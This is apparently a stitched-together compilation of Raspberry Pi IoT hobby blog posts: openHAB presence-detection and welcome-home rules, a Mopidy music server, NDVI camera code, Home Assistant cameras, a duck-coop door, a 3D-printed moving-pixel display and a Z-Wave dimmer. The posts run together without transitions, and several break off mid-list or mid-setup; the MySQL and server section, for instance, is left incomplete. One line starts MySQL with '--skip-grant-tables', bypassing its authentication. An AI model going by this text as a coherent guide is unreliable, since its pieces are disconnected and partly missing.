Beacons (in my case by Estimote) are little Bluetooth LE devices which broadcast their identifiers at regular intervals. Mobile apps can use this as a way of determining their location. They can be used in several ways. The three most common ways are:

To optimize the Thuis rule engine, it needs to have knowledge of what happens around it. One of the useful things to know is who is where, and when.
We'll use presence monitoring to determine who is currently where in the house. As always, we want to publish our data through MQTT, so the other Thuis nodes can use it as well. In [Pi IoT] Thuis #10!

In these last days I have implemented three new features of Phase 2 that will make DomPi more useful to my family: determine who is at home, welcome the family when we arrive home, and send an alert if the temperature in the apartment is either too high or too low. Let´s have a look at them!

This feature allows DomPi to know not only if there is somebody at home, but also who is there. The best solution as of now to implement this is to check whose mobile phone is at home. I know this has some drawbacks, like what if the phone is off or if we left it at home... To partially sort out this problem, DomPi also leverages the motion sensors to limit the impact and make it more reliable. Let´s have a look at all this.

At the beginning, I thought of using the command line (via the executeCommandLine function from openHAB) and then parsing the output of the "ping" on the RPi. While I was working on this, I came across an existing binding in openHAB that has made the development much easier and faster. It is the Network Health Binding; some more details here. This binding connects an item in openHAB with the status of any device or host in general. You could, for example, check the "network health" of your RPi's connectivity to a given host, for instance. For DomPi, I am monitoring the network connectivity to the IPs of our mobile phones. Let´s review the installation and initial config of the binding and then have a look at the implementation. As with any binding, you just need to download the binding itself (the best approach is to download all of the addons from here, as commented in previous posts) and copy the relevant binding (in my case the .jar file is: org.openhab.binding.networkhealth-1.8.3) into the openhab/addons folder.
To fine-tune it, you just need to modify some of the lines in the openhab.cfg file:

# Cache the state for n minutes so only changes are posted (optional, defaults to 0 = disabled)
# Example: if period is 60, once per hour the online states are posted to the event bus;
# changes are always and immediately (refresh interval) posted to the event bus.
# The recommended value is 60 minutes.
networkhealth:cachePeriod=60

# refresh interval in milliseconds (optional, default to 60000)
#networkhealth:refresh=60000

In the end, I only modified line 5 here, uncommenting it. By allowing the cache, the binding gets the status of the devices as always, but only updates the item if there is a change in the status. This means there will only be updates if the phones go out of or into range. With no cache, there would be updates posted to the openHAB bus every refresh interval (60s as per line 7). I don´t need to overload the bus with this information, and also, if you add persistence, there would be a huge volume of these updates to store on the HDD... In any case, the binding will update the devices' status every hour. All in all, with the cache enabled, openHAB will let me know if the devices go from ON to OFF or vice versa, and also every hour it will send an update. I kept the networkhealth refresh (line 8) at the default value.

Potentially, you can connect an item directly to the binding and just display its status in openHAB. Something like this:

Switch Papa_tlf_nh "Papa Network Binding" <present> (gStatus, gPresencia_casa_nh) { nh="192.168.1.140" }

This would display a switch showing whether the mobile phone is in range or not. However, this would not be optimal. It seems that my mobile phone puts the Wifi into sleep mode, probably to save battery. I have not stress-tested this, but I guess while in sleep mode it will not reply to pings.
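Since a sleeping phone may miss individual pings, the raw reachability reading has to be debounced before it is trusted. A minimal Python sketch of that idea follows; it is purely illustrative (the class name is my own, and the 480-second grace period simply mirrors the 8-minute wait used in DomPi):

```python
import time

class PresenceTracker:
    """Debounce flaky reachability results: 'away' is only reported after
    the phone has been unreachable for a full grace period."""

    def __init__(self, grace=480):  # seconds; 8 minutes as in DomPi
        self.grace = grace
        self.home = False
        self.last_seen = None

    def update(self, reachable, now=None):
        """Feed one reachability sample; returns the debounced home/away state."""
        now = time.time() if now is None else now
        if reachable:
            self.last_seen = now
            self.home = True
        elif self.home and self.last_seen is not None:
            # only flip to 'away' once the phone has been silent long enough
            if now - self.last_seen >= self.grace:
                self.home = False
        return self.home
```

For example, a single missed ping shortly after the phone was last seen still reports "home"; only after the grace period has elapsed without contact does the state flip to "away".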
The solution I have implemented is to apply a double level of switches: one as above, connected directly to the binding, and yet another one controlled by an openHAB rule. The rule will get the updated status from the first level switch. When the phone is in range, it will directly update the second level. However, when it is out of range, it may be that the phone is in sleep mode. Therefore, it will wait 8 minutes. If within this time DomPi has not seen the phone in range, it determines that the user/phone is away from home. The description of the second level switch is this:

Switch Papa_tlf "Papa" <present> (gStatus, gPresencia_casa)

And the rule is here:

rule "Presence Identification - Father"
when
    Item Papa_tlf_nh changed
then
    //If the temporary item Papa_tlf_nh has changed to ON,
    //we directly update the final item Papa_tlf and cancel the relevant timer if it exists
    if (Papa_tlf_nh.state==ON) {
        postUpdate(Papa_tlf, ON)
        if (timer_presenceID_papa != null) {
            timer_presenceID_papa.cancel
            timer_presenceID_papa = null
        }
    } else if (Papa_tlf_nh.state==OFF) {
        //If it is OFF, it can be that the phone is saving battery on Wifi
        //Let´s allow 8 minutes since the last time it was updated before putting presence to OFF
        if (timer_presenceID_papa == null) {
            //if there was no timer until now, create it
            timer_presenceID_papa = createTimer(now.plusSeconds(480)) [|
                //Allow 8 minutes and modify Papa_tlf item
                if (Papa_tlf_nh.state==OFF) postUpdate(Papa_tlf, OFF)
                if (timer_presenceID_papa != null) {
                    timer_presenceID_papa.cancel
                    timer_presenceID_papa = null
                }
            ]
        }
    }
end

The drawback of this implementation is that I need a rule per phone. In the end I am just planning to monitor two phones, so it won´t be a big issue. However, I need to review openHAB's capabilities, as I am sure I can condense all the devices to monitor into a single rule. I will look into this when optimizing the code, after the Challenge unfortunately... You can see some snapshots below with this feature. The line Quien esta en casa?
=> Who is at home? summarizes in the Main Menu how many people are there. It is a clickable item that takes you to the right hand side submenu with the details.

With this, I intend to execute some actions when somebody has arrived home. At this stage, the action is to turn on the lights of the living room and the parents´ bedroom, and in the next development it will also turn on the TV and switch it to the TV channel we usually watch. This can be very useful to us, as you can have some light at the end of the corridor without having to walk there. Also, the light in our room takes time to be fully lit, so it is good as well to turn it on some minutes in advance. I have written the code and split it into four openHAB rules. It all starts by determining when the apartment is empty, since it is only after the flat is empty that it makes sense to wait for the family and welcome them warmly, or at least "lightly". The first rule is quite straightforward:

//This rule determines if there is presence at home
rule "Detect any presence at home"
when
    Item Nodo09MotionDetected changed from OFF to ON or
    Item Papa_tlf changed from OFF to ON or
    Item Mama_tlf changed from OFF to ON
then
    if (Someone_at_home.state != ON) postUpdate(Someone_at_home, ON)
end

If there is movement, or DomPi discovers any phone at home, then we determine that there is a family member. This assumption has to be fine-tuned in the future: what about if we forgot the mobile phones, etc. It may happen that there is motion detected because a burglar broke in...
We should not welcome him or her! This is controlled by another rule, which checks the status of the Alarm Switch; if it is on, then we won´t trigger the welcome feature:

rule "Welcome home family"
/*If someone has arrived home and there was nobody before inside, let´s do:
 * Turn on light in the living room if luminosity is low
 * Turn on light in the parents bedroom if luminosity is low
 * Improvements: turn on TV and say hello
 */
when
    Item Someone_at_home changed from OFF to ON
then
    if (Nodo09AlarmSwitch.state==OFF) {
        //Reconfirm that the alarm switch is off - it can be that rule "Detect any presence at home"
        //has changed Someone_at_home, but alarm is active
        say("Welcome at home!!") //Let´s be nice to the family even if no lights need to be turned on ;)
        if (gLuminos.state<50) {
            //Average luminosity is low, lets turn on the lights
            postUpdate(Lampara_2, ON) //Parents light
            postUpdate(Lampara_3, ON) //Living room light
        }
    } else if (Nodo09AlarmSwitch.state==ON)
        postUpdate(Someone_at_home, OFF) //We avoid welcoming burglars!
end

As you can see in the rule, before turning on the lights it checks the average luminosity in the apartment, taking into account only the luminosity from the sensors in the flat: kids, parents and living rooms. If the average is below 50%, it turns on the lights. I will adjust this value after some days testing it. The last two rules determine whether the family came back home or left home. They will update the item Someone_at_home accordingly:

//This rule determines if there is nobody at home and if so updates item
rule "Did family leave home"
when
    Item Someone_at_home changed from OFF to ON
    //Thread launched as soon as we determine someone is at home.
    //It will start to check the conditions to determine that there is noone at home
then
    if (timer_presenceat_home != null) {
        timer_presenceat_home.cancel
        timer_presenceat_home = null
    }
    while (Someone_at_home.state==ON) {
        //if there is no motion detected and all of the members from gPresencia_casa (Mama and Papa)
        //are in the state OFF, which means they are not at home, then execute the loop inside
        if (Nodo09MotionDetected.state==OFF && (gPresencia_casa.members.filter(s | s.state==ON).size==0)) {
            //Wait 30 mins and check again if there was any movement
            //this long delay helps to avoid issues if somebody is in the bath, etc
            timer_presenceat_home = createTimer(now.plusSeconds(1800)) [|
                if (Nodo09MotionDetected.state==OFF && (gPresencia_casa.members.filter(s | s.state==ON).size==0)) {
                    //Still no movement -> modify item
                    postUpdate(Someone_at_home, OFF)
                }
                if (timer_presenceat_home != null) {
                    timer_presenceat_home.cancel
                    timer_presenceat_home = null
                }
            ]
        }
        if (Someone_at_home.state==ON) Thread::sleep(120000) //Every 2 mins determine if someone is at home
    }
end

rule "Did family come back home"
when
    Item Someone_at_home changed from ON to OFF
    //Thread launched as soon as we determine nobody is at home
    //It will start checking the conditions to determine that somebody entered home
    //Conditions to determine someone at home:
    // if there is a mobile phone in the wifi range
    //There is no need to check if any mobile phone appears in range via the Network Binding
    //since there is already a rule ("Detect any presence at home") that would modify the
    //item Someone_at_home to ON
    // if there is motion detected and 1)the alarm is not active, or 2)alarm is active but
    // user turns it off within time limit
then
    while (Someone_at_home.state==OFF) {
        if (Nodo09MotionDetected.state==ON) {
            if (Nodo09AlarmSwitch.state==OFF) postUpdate(Someone_at_home, ON)
            else {
                //val t_delay = t_delay_trigger_alarm * 1000 + 200
                Thread::sleep(60200) //Wait the 60 secs plus 200 ms to allow some updates
                //Change with t_delay_trigger_familyhome
                if (Nodo09AlarmSwitch.state==OFF) postUpdate(Someone_at_home, ON)
            }
        }
        if (Someone_at_home.state==OFF) Thread::sleep(10000) //Sleep for 10s before checking again
    }
end

This feature notifies me per email if any temperature sensor at home is below 20ºC or above 27ºC. Many thanks to jkutzsch, who gave me the idea back in May, at the very beginning of the Challenge. Finally, I can implement it! I have implemented it in a single rule. If the alarm is triggered and the email sent, then the rule launches a timer to wait for 1h before sending any further notification: I want to avoid spamming myself!

/*
 * Rule to send an email warning if temperature at any room is out of a given range
 */
rule "Notify of extreme temperature at home"
//If any room is below 20ºC or above 27ºC send notify per email
when
    Item gTempers received update
then
    //First step to check if the timer is not null, this implies that there was an email already sent and
    //DomPi is waiting some time (1h-2h) before resending the notification
    if (timer_extreme_temperature_alarm==null) { //no timer - we can send the email if required
        //check values of the temperature sensors from home (interiors only)
        gTempers?.members.forEach(tsensor| {
            if (tsensor.state>=27) send_alarm_high_t = true
            if (tsensor.state<=20) send_alarm_low_t = true
        })
        if ((send_alarm_high_t) || (send_alarm_low_t)) {
            //Send email with the alarm and then create the timer
            var String email_subject = ""
            var String email_body = ""
            if (send_alarm_high_t) {
                email_subject = "Alta temperatura en Casa. Alarma"
                email_body = "Detectada alta temperatura en casa"
            }
            if (send_alarm_low_t) {
                email_subject = "Baja temperatura en Casa. Alarma"
                email_body = "Detectada baja temperatura en casa"
            }
            sendMail("XXXX@gmail.com", "DomPi - " + email_subject, email_body)
            timer_extreme_temperature_alarm = createTimer(now.plusSeconds(3600)) [|
                //Wait 1h and then just remove the timer to allow the next notification as required
                if (timer_extreme_temperature_alarm!=null) {
                    timer_extreme_temperature_alarm.cancel
                    timer_extreme_temperature_alarm = null
                }
            ]
        }
    }
end

As I continue to run through the existing rules, I find ways to improve on them. Below a summary of the news this week: More items turning into Green!!

To generate a temperature gauge, there is the additional file gauge.py. NOTE - An extra file will be required to get the competition house information. I created a new account in their webpage (as a free user) and started playing. Each account comes with a username and a key, which has to be included in the code using the platform or the environment.

This interface has three frames:
1. CONNECTION STATUS - Shows whether we are connected to the broker and which local IP we are using. If connection was not established, we can enter and try a different local IP.
2. SMART HOUSE - Displays:

The next step for our central node is to host a server. After the setup, it will provide: The next sections describe how to install each of the new capabilities.

service mysql stop
sudo mysqld_safe --skip-grant-tables
sudo mysql --user=root mysql

FULL TUTORIAL:

The command to install the packages is:

sudo apt-get install apache2 php5 libapache2-mod-php5

Afterwards, we will have in the main node:

Regarding the MySQL and Apache servers, here are some useful commands:

RESTART THE SERVICE: sudo service mysql restart
START THE SERVICE: sudo service mysql start
STOP THE SERVICE: sudo service mysql stop

For the competition system to work, our central node will be receiving each roommate's status through the Internet.
This information will then be stored in the database so that the main program (the previously developed Python GUI) can access it. This will be done in PHP:

With this post, the setting up of our central node is completed!! There is still much development to do on top of that!!

The Internet of Things is about connecting the things around you in a meaningful way. In the last few posts, I showed how to connect and monitor a few sensors inside the home using a Raspberry Pi. Now it's time for a little entertainment. After the basics at home, I believe it's going to be our entertainment systems coming online next. In this post, I'll explore the idea of an internet connected music player with a Raspberry Pi.

Enter Mopidy

Mopidy is much more than a normal music player. It makes your music device accessible from the web and also enables it to stream content from the web, like Spotify, Google Play Music, etc. The best part: you can access your music player from your smartphone, tablet or PC. This is how it's going to work: Mopidy is going to run on your Raspberry Pi (I'm using a Pi 3). It will be working as a daemon (background process) on your Pi, and your Pi must be connected to a network. Now you can access the Mopidy UI using any of your devices - either phone, tablet or another PC. It's basically like a Bluetooth streaming experience, except that it won't drain your battery. But the catch is your music files should either be available on your Pi or be played from the cloud.

Hardware Setup

The hardware setup is really simple. You have to connect a speaker to your 3.5mm jack. I'm using a USB powered speaker, which I power from the Pi.

Software Installation

Although there is an official apt repository method for installing Mopidy on the Pi, I will be following the pip method. The version in the apt repo seems to be old - 0.19, while the one from pip is new - 2.x. First thing to do is to install all the gstreamer dependencies on the Pi.
Use the following command to install the dependencies:

sudo apt-get install python-gst-1.0 gstreamer1.0-plugins-good gstreamer1.0-plugins-ugly gstreamer1.0-tools gir1.2-gstreamer-1.0 gir1.2-gst-plugins-base-1.0

Now we can go on to install Mopidy using pip. Use the following command to install:

sudo pip install Mopidy

This will install the Mopidy music server on your Pi. Before using it, we have to configure Mopidy to be accessible from other devices. This will be particularly helpful if you are running the Pi headless. The other thing is, once you configure this access, you will be able to control the music player from your mobile phone or another PC as well. To edit the configuration:

nano ~/.config/mopidy/mopidy.conf

The basic structure of the file is sections in square brackets (e.g. [core]) with options under them. First, to be able to access Mopidy from outside, you need to enable the MPD and HTTP sections. Navigate to the sections and modify them as given below:

[mpd]
enabled = true
hostname = 0.0.0.0
port = 6600
password =
max_connections = 20
connection_timeout = 60
zeroconf = Mopidy MPD server on $hostname
command_blacklist =
default_playlist_scheme = m3u

[http]
enabled = true
hostname = 0.0.0.0
port = 6680
static_dir =
zeroconf = Mopidy HTTP server on $hostname

Now you will be able to access your Mopidy from any device. Next, you have to install clients to be able to access it. First we'll configure a webclient so that we can access Mopidy from PC/tablet/phone. You can get a non-exhaustive list of webclients for Mopidy from . For this project, I chose to use 'Musicbox_webclient'. To install it, just enter:

sudo pip install Mopidy-MusicBox-Webclient

Now you will be able to access your Mopidy from any of the web clients from any device. Now you can go to http://<Pi's IP>:6680 and you will see a page like this: This page should show all the available webclients for Mopidy. Here I have only one.
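With the MPD and HTTP sections enabled as above, a quick sanity check from another machine is to probe the two TCP ports (6600 for MPD, 6680 for HTTP). A small Python sketch of such a probe follows; the Pi address in the comments is a placeholder, not from the post:

```python
import socket

def service_reachable(host, port, timeout=2.0):
    """Return True if a TCP service accepts connections on host:port.
    Handy for confirming Mopidy is up when the Pi runs headless."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        # connect_ex returns 0 on success instead of raising
        return s.connect_ex((host, port)) == 0
    finally:
        s.close()

# Example (replace with your Pi's actual IP):
# service_reachable("192.168.1.50", 6600)  # MPD port
# service_reachable("192.168.1.50", 6680)  # HTTP port for the webclients
```

If both checks pass but the web page doesn't load, the problem is likely in the webclient installation rather than the server configuration.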
You can click on it and will be taken to a page like this: From this point, it behaves as a normal music player. You will be able to browse your local music files and play them using this UI.

Let's Party

Here is a small demo of how I'm using Mopidy with the MusicBox client from my Android mobile. It is the web client itself, but I created a shortcut on my home screen so that I can open it easily. Happy Hacking, vish

Today a quick note on how to connect the two Pi's. In my blog yesterday I talked about taking images in the garden. But up till now the master Pi 3 (with NoIR camera) and slave Pi B+ (with color camera) have been connected via my local network: the Pi 3 using its internal WiFi, and, since the WiPi dongle was missing from my kit, the Pi B+ using a cable to my network router. This is not a workable solution, since I'd like to take the camera to my garden, or to a field where no network is available. Therefore I connected the two Pi's using a short Ethernet cable. Luckily no cross-over cable is needed, since the Ethernet ports of the Pi are auto-sensing. I don't want to install a DHCP server on the Pi 3, so I'm using static IP addresses by adding the following to the /etc/dhcpcd.conf file:

# static ip address (gp 24/8/2016)
interface eth0
static ip_address=192.168.2.222/24
static routers=192.168.2.1
static domain_name_servers=192.168.2.1

Here is a picture of the setup: stay tuned

Things have been moving around the Farm lately, so expect to see some catch-up blog posts coming at you soon! First, anyone else have a loving, caring, helpful spouse who makes your projects grow exponentially? :-) When the project was first planned out we were looking at working with Chickens and Rabbits. Since then my wife has expanded/added G.O.A.Ts (see previous blogs), Guinea Fowl, and now Ducks! (There has been rumor of Peacocks in the future, but luckily none can be found in the immediate 250 mile radius.)
At this point I have not worked IoT into the new fowl, but I found an opportunity to use the Ducks as a trial for my future door monitoring with the Chickens. Welcome to the Duck Domain! The fence is actually up to try and keep out the previously mentioned G.O.A.Ts. It seems that Duck food, Chicken food, heck even Rabbit food is all fair game to those rascally Terminators if their ocular targeting system finds it! These are all "free" ducks that she was able to find advertised online; it started as 2, then 2 more, then 2 more, you get the idea. Yes, Chickens are Gateway Fowl, quickly escalating into the Farmer's wife needing more and more diverse additions! The nice side of it is duck eggs are big! The pool gets cleaned often, with the water being toted over to nearby trees for reuse. Eventually a pump system is planned to quickly drain it, but for now it is bucket power!

So the problem addressed to me: using the handy dandy egg roller tool (see above) to get eggs out of the Ducky Domain Domicile is less than efficient. I have been planning out a sliding door option for the Chicken Casa and thought this would be a good opportunity to apply it quickly using some materials on hand. I have been trying to use free materials as much as possible; recycling and no cost are big pluses on this Farm. So taking a handy dandy pallet, I left one solid board on the bottom to ensure nesting materials stay in the nest and then removed 2 boards out of the middle section on both front and back, ending up with 4 cut boards.

#1 I then took 2 2x4s a little shorter than 1/2 the height of the pallet and screwed the 4 boards onto them at the appropriate location to allow for the 2x4 door to be fully down and have the hole covered, as shown above.

#2 I then used some baling wire attached to the top of the sliding door to make a firm handle to lift up and control the door.
#3 Finally I added a hole through the pallet and the door so that when the door is lifted, a screw can be put in to hold everything up and in place. There is a staple on the top to hold the screw when it is not being used.

#4 Here is the "back" side, which will actually be the inside. You can better see how the 2 2x4s were put in place with the 4 cut boards sealing the hole. You can also get a slightly better view of the wire handle for lifting the door. Here is the door locked into its up position.

Next step: install it and have the wife test it out. Here the pallet back with sliding door has been placed onto the backside of the Duck Domain Domicile to allow easy access for eggs. The view through the new sliding door! The wife loves it and now wants 3 more. Sigh... But I like this design for use with the Chicken Casa, and adding a sensor for when it is closed will let us know remotely when they are locked up. Eventually upgrades will add a remote motor to open it, but especially with this implementation I wanted a heavy door that stays down and keeps out potential egg/duck thieves of the non-human variety. For all of you Water Fowl enthusiasts, yes, we are looking at a full duck pond in the future. My son has already started digging and I have been researching Sodium Bentonite as a water holder. We would really like to work in a self-cleaning pond, so more research is in the future for that!

Today a quick update. I wrote a small program to extract the GNDVI and BNDVI images as explained in my previous post. As explained last week, I added the infra-blue filter in front of the Pi NoIR camera in order to get rid of the red part of the scene. Then I wrote a small Python program which grabs a color image and converts it to GNDVI and BNDVI: The range of the original NDVI images is -1 to +1.
In order to display this properly, I converted these values to the range 0-255 and applied a colormap such that NDVI value 0 is green, -1 is blue and +1 is red:

# import the necessary packages
from picamera.array import PiRGBArray
from picamera import PiCamera
import time
import numpy as np
import cv2

# initialize the camera and grab a frame into a numpy array
camera = PiCamera()
rawCapture = PiRGBArray(camera)
time.sleep(0.1)
camera.capture(rawCapture, format="rgb")
color_image = rawCapture.array

# extract the NIR (red), green and blue channels
nir_channel = color_image[:,:,0]/256.0
green_channel = color_image[:,:,1]/256.0
blue_channel = color_image[:,:,2]/256.0

# calculate and show gndvi
gndvi = (nir_channel - green_channel)/(nir_channel + green_channel)
gndvi = (gndvi+1)/2
gndvi = cv2.convertScaleAbs(gndvi*255)
gndvi = cv2.applyColorMap(gndvi, cv2.COLORMAP_JET)
cv2.imshow("GNDVI", gndvi)

# calculate and show bndvi
bndvi = (nir_channel - blue_channel)/(nir_channel + blue_channel)
bndvi = (bndvi+1)/2
bndvi = cv2.convertScaleAbs(bndvi*255)
bndvi = cv2.applyColorMap(bndvi, cv2.COLORMAP_JET)
cv2.imshow("BNDVI", bndvi)

# display the original image on screen and wait for a keypress
cv2.imshow("Image", color_image)

# save images
cv2.imwrite("./images/color.jpg", color_image)
cv2.imwrite("./images/gndvi.jpg", gndvi)
cv2.imwrite("./images/bndvi.jpg", bndvi)
cv2.waitKey(0)

Unfortunately, at the time of writing sunset had already passed two hours ago, so I couldn't image the plants in my garden. The only agricultural stuff I could image was a raspberry: Stay tuned for real plant images and 'real' NDVI images using the other camera's red channel.
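The rescaling above from [-1, +1] to [0, 255] is just a linear map applied before the colormap. Here is the same arithmetic in isolation, as plain Python with no camera or OpenCV needed (the function names are mine, for illustration):

```python
def ndvi(nir, vis):
    """Normalized difference index of two reflectance values in [0, 1]."""
    return (nir - vis) / (nir + vis)

def to_8bit(ndvi_value):
    """Map an NDVI value from [-1, +1] to [0, 255], as done before color mapping."""
    shifted = (ndvi_value + 1) / 2   # now in [0, 1]
    return round(shifted * 255)      # now in [0, 255]

# healthy vegetation: strong NIR, weak visible reflectance -> high end of the scale
print(to_8bit(ndvi(0.8, 0.2)))  # 204
# NIR and visible similar (NDVI == 0) -> mid-scale, rendered green by the JET colormap
print(to_8bit(ndvi(0.5, 0.5)))  # 128
```

This makes it easy to sanity-check individual pixel values before running the full image pipeline.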
Here is a quick post on integrating cameras with Home Assistant. Basically, as part of the Home Assistant dashboard, we are going to add two sections showing the previews of the Pi cameras, as shown in the pictures below. Here are the steps to follow to integrate the Pi cameras with Home Assistant.

#1 Connect the Pi camera to the Raspberry Pi 3 and run the following commands to create a directory called picamera:

pi@hub:~ $ cd /home/hass
pi@hub:/home/hass $ sudo mkdir picamera
pi@hub:/home/hass $ ls
picamera
pi@hub:/home/hass $ sudo chown hass picamera

and then create an image file:

pi@hub:/home/hass/picamera $ touch image.jpg

#2 Update the configuration.yaml file:

camera:
  platform: rpi_camera
  name: Raspberry Pi Camera
  image_width: 640
  image_height: 480
  image_quality: 7
  image_rotation: 0
  timelapse: 1000
  horizontal_flip: 0
  vertical_flip: 0
  file_path: /home/hass/picamera/image.jpg

and then stop and start Home Assistant and test:

sudo systemctl stop home-assistant@hass
sudo systemctl start home-assistant@hass

#3 To add the security camera to the dashboard, modify configuration.yaml to include the following under the camera section:

- platform: mjpeg
  mjpeg_url:
  name: Security Camera

Change the mjpeg_url above to use the security camera Pi's IP address.

#4 To add the Security Camera preview tab and the Intruder Detection tab (which shows the picture gallery), add the following under the panel_iframe section of the configuration.yaml file:

intruder:
  title: 'Intruder detection'
  icon: 'mdi:nature-people'
  url: ''
securitycam:
  title: 'Security Cam'
  icon: 'mdi:camera'
  url: ''

Change the url values above to use the security camera Pi's IP address.

I am not sure whether the Dynamic Surface is animatronics or something related to robotics. From a certain point of view it is a sort of modular robotic pixel reacting to certain kinds of inputs in certain conditions.
From another point of view it is modular animatronics, an object - a memory of the famous Warhol soup can - changing its height smoothly and precisely. Indeed, an animatronic is considered a robotic device that mimics human gestures: a puppet, a moving object built with elements usually static or created for different usages. From Wikipedia, the definition of animatronics is: Animatronics refers to the use of robotic devices to emulate a human or an animal, or bring lifelike characteristics to an otherwise inanimate object.

So, what is the Dynamic Surface? The Dynamic Surface is a series of modular, physical pixels - named m-Pix - assembled together in rows or matrices, creating flexible and reactive surfaces. Due to its modular architecture, involving both the hardware construction and the electronics, there are virtually no limits to expanding this device, which can easily be controlled by a small SBC like the Raspberry Pi. But... we can also think of this compound structure as a robotic POP modular dimensional display. The design details and simulation are described in PiIoT - The perfect reading place #19 [tech]: Dynamic surface, design and simulation.

I should mention the MuZIEum, which has partnered on this project. The Dynamic Surface will be installed, together with the other parts of this Internet of Things project, at the MuZIEum site, to be available and playable by visitors starting from the first days of December 2016; with special thanks to the project manager Carlijn Nijhof. She trusted the idea when it was just an idea, and very difficult to explain. Another great thanks to GearBest.com which, together with the main sponsor Element14, has contributed to the project by providing the 100 stepper motors and controllers needed by the entire project. I can't forget to mention shabaz, who suggested how to fix the levers to the motor: with hot air. This simple tip has saved me a lot of time and proved to be a stable and reliable solution.
This m-Pix prototype will be used to develop the software. The 64 modules of the Dynamic Surface will be produced over the next month of September, as the final characteristics - surface, color and container - will be discussed with the MuZIEum staff to integrate the components in accordance with the site style, colors and environment. We should take into account that the project is constrained by some important parameters: the Dynamic Surface will be presented to the visitors also by visually impaired personnel. The main goal is demonstrating how non-visual perception can be enhanced and improved by IoT technologies. Alternative user interface methodologies can change and empower the approach between humans and digital machines.

A full m-Pix structure is composed of 10 parts. The above image shows seven finished elements: the three parts of the moving cylinder, the support, and the motor and levers holder. Below we see in detail the printing process of these parts.

The images above show four moments while printing the top, bottom and central parts of the moving cylinder. These parts should be lightweight and are not subject to particular mechanical stress; to reduce the printing time and the weight, these three parts are only 20% filled, with a 0.6 mm external skin thickness. It is sufficient to refine the surface after printing without consuming too much material. The choice to make the cylinder in three parts simplifies the assembly with a more flexible 3D printing strategy.

The above sequence shows four steps of the 3D printing of the support. This part acts as a guide for the moving cylinder and fits inside it; this makes it possible to use little material - again 20% filled - while still guaranteeing good positioning of the part: the cylinder moves vertically and avoids rotating, without generating friction.

Above, the levers joint. It is a small piece, but it has to connect the motion levers; it is 3D printed with 100% fill and is glued internally to the bottom cover of the cylinder.
The 3D printed motor support - including the end-stop switch support - is built in two parts. The reason is the same: speeding up the 3D printing time with a lower fill while still making a robust component. The base of the support (the rightmost in the above image) is fairly large and includes the switch support. The motor holder is kept separate and will be glued onto the other part inside the engraved area. This gives a perfect positioning and the option to rotate the holder for last-minute adjustments. These parts are 3D printed with a 30% fill.

This is the main structure support that will hold the motor and the moving parts. As shown in the 3D printing sequence above, in this case too the printing fill density is only 25%. By gluing the motor supports in the engraved area visible in the fourth image, the movement forces impact the structure in a direction aligned with the filling support. Indeed, the base is somewhat flexible, to compensate for unexpected mechanical stress when many modules are assembled together.

Using a special product suitable for PLA and PVC, the parts are glued together. The first step is assembling the bottom of the cylinder with the lever joint: it should be glued internally, then the cylinder can be closed with the top and bottom parts. The images above show the cylinder bottom cover with the joint glued. Note that the cover has a relief circle to keep it in position with the cylinder body. Now the cylinder can be closed with the top cover, as shown in the images below. The next step is to glue the base with the motor support and the cylinder guide.

Every module uses a 28BYJ-48 geared stepper motor controlled by an LM298-based motor controller. The controller will be wired externally to the m-Pix, while the motor is fixed in the motor support glued to the base. In addition, an ultra-subminiature micro switch by Omron is used as an end-stop to self-position the m-Pix at its lowest point.
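The end-stop switch makes a simple homing routine possible: step the cylinder downward until the switch closes, then treat that position as zero. The sketch below simulates that logic in plain Python; the names and the simulated switch are hypothetical, and on the real hardware the switch state would come from a GPIO read while the steps would go to the motor controller:

```python
def home_axis(step_down, switch_closed, max_steps=4096):
    """Drive the m-Pix down until the end-stop closes; return steps travelled.

    step_down: callable performing one downward motor step
    switch_closed: callable returning True when the end-stop is pressed
    """
    for steps in range(max_steps):
        if switch_closed():
            return steps  # this position becomes the logical zero
        step_down()
    raise RuntimeError("end-stop never triggered; check wiring")

# Simulated hardware: the cylinder starts 120 steps above the end-stop.
position = [120]
def fake_step_down():
    position[0] -= 1
def fake_switch_closed():
    return position[0] <= 0

print(home_axis(fake_step_down, fake_switch_closed))  # 120
```

The max_steps guard matters on real hardware: if the switch is miswired, the routine stops instead of grinding the gears forever.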
The datasheets of the components are attached below. The images below show the motor and the linear motion transducer levers. The prototype is complete and all the parts work correctly. The next step will be controlling the movement. The detail images below show the geared stepper motor connected to the transducer levers, acting like a camshaft. Thanks to shabaz's suggestion, the easiest way to fix the first lever to the motor shaft was to 3D print the collector about 0.25mm smaller, then fit it over the shaft with hot air. The motion has no impact on the lever locking: the motor shaft imparts a torsion to the component and it remains in place without risk.

One thing I forgot to show you earlier is how to install Z-Wave devices in your house. In this post I'll install a dimmer module in the bedroom, which will be part of the wake-up light. The materials I'm going to use are the following: For your own safety, always cut the power when working on your lights. Find out in which group your light is placed and disable the power for this group. Prepare the dimmer and push buttons by connecting them together. It's best to do this now: while you're not working in the wall yet, you have plenty of room. Now install the dimmer and buttons in place and connect the live and switch wires. Push everything inside to check if it fits, but don't close it with screws yet. Now connect the light itself and screw in a light bulb. And there was light:

By clicking the S1 button you can turn the light on and off. By holding it you can dim it. A nice surprise was that this is the first dimmer/LED combination which doesn't make any noise while dimming! Now that we've verified the light works, the only thing left is finishing up the buttons. Screw it into place and click the buttons into their sockets.

The Dynamic Surface is another moving subproject that is part of the PiIoT design.
It represents an independent moving platform: just as the Sense HAT includes an 8x8 RGB LED matrix, the Dynamic Surface is a physical 8x8 matrix built with big moving pixels. The video below shows a rendered simulation of the assembly design: an example of a modular Dynamic Surface built from a set of 81 modules. As shown above, the moving pixel is built from ten pieces that together form an m-Pix. A single m-Pix should be self-contained, so that modules can be assembled into a matrix platform without empty spaces, creating the floating-surface effect. The rendering of the matrix simulation is shown in the image below. Every module should adhere to the following requisites:

As I have written many times before, in my opinion the most important step when creating a 3D printed object is the design. I mean that - especially when moving parts are involved - it is in the design phase that we can create the right solution, always considering the limits and advantages of 3D printing technology. The sequence of images below shows the simulation of the parts that make up the entire m-Pix module:

Image above: the motor and the base support (here in the horizontal view) act on the cylinder, while the stabilisation support is internal: this saves a lot of space but grants good stability to the moving element.

Above images: making the moving cylinder in three separate parts saved a lot of time and made things easier. With the stabilisation support built into the moving component, the cylinder will be the largest element in the module. That is just what we want.

Another important part of the design is how we convert the stepper motor rotation into linear movement. As shown in the exploded rendering above, the adopted solution is a lever system working as a camshaft. Due to the reduced space and the low power available here, we are using a geared stepper motor, which has the disadvantage of moving relatively slowly compared with the traditional, more powerful steppers.
